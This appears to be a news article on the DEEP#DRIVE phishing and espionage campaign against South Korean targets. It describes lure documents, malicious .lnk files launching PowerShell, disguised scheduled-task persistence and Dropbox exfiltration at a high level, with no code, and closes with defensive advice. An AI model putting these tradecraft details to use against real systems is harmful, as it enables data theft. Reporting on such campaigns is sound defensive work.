DEEP#DRIVE: Major Cyberattack Hits South Korea

DEEP#DRIVE: Massive Cyber Espionage Operation

A large-scale cyberattack, known as DEEP#DRIVE, has been launched against South Korean businesses, government agencies, and cryptocurrency users. This phishing attack has already affected thousands of individuals, with hackers using fake documents to trick victims into downloading harmful software. The attack was first detected in September 2024, and its primary goal appears to be stealing sensitive information from South Korean entities.

Cybersecurity researchers investigating this campaign discovered that hackers are sending phishing emails written in Korean, disguised as important documents such as work logs, insurance files, and cryptocurrency-related reports. These emails contain malicious attachments that, when opened, install malware on the victim’s device.

One example of this deception involved a file disguised as a Telegram.exe application. The document was labeled 대차 및 파레트, which translates to “bogie and pallet” in Korean. It contained details like product name, factory location, and total weight, suggesting that hackers were targeting businesses in the logistics sector.

To make the attack more convincing, hackers used trusted file formats, such as .hwp (a common Korean document format), .xlsx (Excel spreadsheets), and .pptx (PowerPoint presentations). These files were often stored on popular platforms like Dropbox, which helped the hackers avoid detection by traditional security systems. Researchers have confirmed that phishing was the primary method of infection, as the filenames and document themes closely matched common phishing techniques.

How the DEEP#DRIVE Attack Works

The DEEP#DRIVE campaign follows a multi-stage process designed to infect victims’ systems and extract valuable data. The attack typically begins when a user opens a .lnk file, which appears to be a harmless document but is actually a shortcut that executes malicious PowerShell scripts. These scripts allow hackers to gain control over the system and deploy additional harmful software.

Once the attack begins, the PowerShell script performs several key actions:

  • Collecting system details, including the victim’s IP address, operating system version, installed antivirus software, and currently running processes.
  • Downloading additional malicious files, disguised as legitimate applications such as Telegram.exe.
  • Ensuring the malware remains active on the system, by setting up scheduled tasks like ChromeUpdateTaskMachine to run automatically.

Exfiltrating stolen data to the hackers’ Dropbox accounts.

One of the primary tools used in this campaign was a script called “system_first.ps1”, which gathered critical system information and sent it to the hackers. Another script, “temp.ps1”, was responsible for deploying the final malicious payload. While researchers were unable to capture the full details of this payload, they suspect it was a backdoor, allowing hackers to gain persistent access to infected devices.

To avoid detection, the hackers used advanced stealth techniques, including:

  • Using meaningless variable names to make scripts harder to analyze.
  • Adding unnecessary lines of code to create confusion.
  • Manipulating strings in a complex way to prevent easy identification by security tools.

Additionally, once the attack was completed, the hackers deleted their Dropbox links, making it difficult for investigators to trace their activity. This suggests that the attackers had planned the operation carefully and used a temporary attack infrastructure to evade tracking.

Suspected Hackers and Security Measures

The methods and techniques used in the DEEP#DRIVE attack closely resemble past cyber operations carried out by an Advanced Persistent Threat (APT) group known for targeting South Korea. Cybersecurity researchers believe that the same group is behind this attack due to their use of phishing, PowerShell scripts, and Dropbox for data exfiltration.

To protect against similar attacks, cybersecurity experts recommend several important measures. One of the most critical steps is educating users about phishing tactics. Many cyberattacks succeed because people unknowingly click on malicious links or download infected files. Organizations should train employees to identify suspicious emails, avoid clicking on unverified links, and be cautious when downloading attachments.

Another key defense strategy is monitoring malware staging directories. Many attacks involve storing temporary malicious files on a system before executing them. Security teams should regularly check these directories for unusual or unauthorized files that could indicate an ongoing attack. By identifying threats at an early stage, organizations can prevent malware from spreading further.

Lastly, experts emphasize the importance of using strong endpoint logging systems, such as PowerShell logging. Since PowerShell scripts are commonly used in cyberattacks, logging all PowerShell activity can help security teams detect suspicious commands or unauthorized access attempts. This allows organizations to respond quickly and block malicious activities before they cause significant damage.

The DEEP#DRIVE cyberattack highlights the growing risks posed by phishing campaigns and the need for strong cybersecurity measures. With thousands of people already affected, this is one of the most significant cyber threats targeting South Korea in 2024.

TOP 10 TRENDING ON NEWSINTERPRETATION

Newsom draws Megyn Kelly’s ire after sharing old Trump clips to boost online trolling campaign

A sharp exchange unfolded when a well-known media host...

Shocking Files Reveal Bill Clinton Letter in Epstein’s Infamous ‘Birthday Book’

Oversight Committee Releases New Epstein Records The House Oversight Committee...

McGregor channels Trump populism with Musk support in high-stakes Irish presidential race

In early September 2025, Ireland was taken by surprise...

Federal authorities seize $3 million in crypto linked to ransomware that hit US hospitals

Federal authorities have seized nearly $3 million worth of...

Bernie Sanders backs Zohran Mamdani in New York City mayor race citing grassroots momentum

A major political figure has stepped into the New...

JPMorgan handled $1.1 billion for Jeffrey Epstein despite warnings of criminal ties and reputation risk

JPMorgan Chase, one of America’s biggest banks, had a...

Qualys confirms limited Salesforce data access during Drift hacking campaign raising security concerns

Hackers accessed some Salesforce information from risk management company...

Ashley Hinson sparks clash with Newsom after claiming America should look more like Iowa

A sharp political exchange has broken out after U.S....

WSJ report says malware email linked to Chinese group aimed at U.S. tariff negotiations

U.S. authorities are investigating a suspicious email that carried...

Related Articles

Popular Categories

error: Content is protected !!